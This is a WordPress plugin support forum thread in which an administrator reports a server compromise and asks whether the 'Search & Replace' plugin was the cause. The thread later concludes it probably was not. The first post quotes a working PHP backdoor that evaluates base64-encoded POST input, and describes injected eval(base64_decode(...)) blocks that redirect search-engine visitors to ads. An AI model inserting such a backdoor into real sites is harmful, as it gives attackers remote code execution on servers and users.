Search & Replace
Possible security issue in "search and repalce" 2.6 (4 posts)

  1. louisremi
    Posted 3 years ago #


    One the server I'm administrating was corrupted. We aren't exactly sure about what happened yet but here's what we've found:
    - There's a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    - There's a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    - There are several plugins installed on this WordPress, including "search and replace", but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgx

    I just wanted to let you know and see if other users had similar troubles.


  2. NFWRo
    Posted 3 years ago #

    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?

  3. louisremi
    Posted 3 years ago #


    We haven't been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

  4. NFWRo
    Posted 3 years ago #

    Thanks for the update - that's good to know.

Topic Closed

This topic has been closed to new replies.

About this Plugin

  • Search & Replace
  • Frequently Asked Questions
  • Support Threads
  • Reviews

About this Topic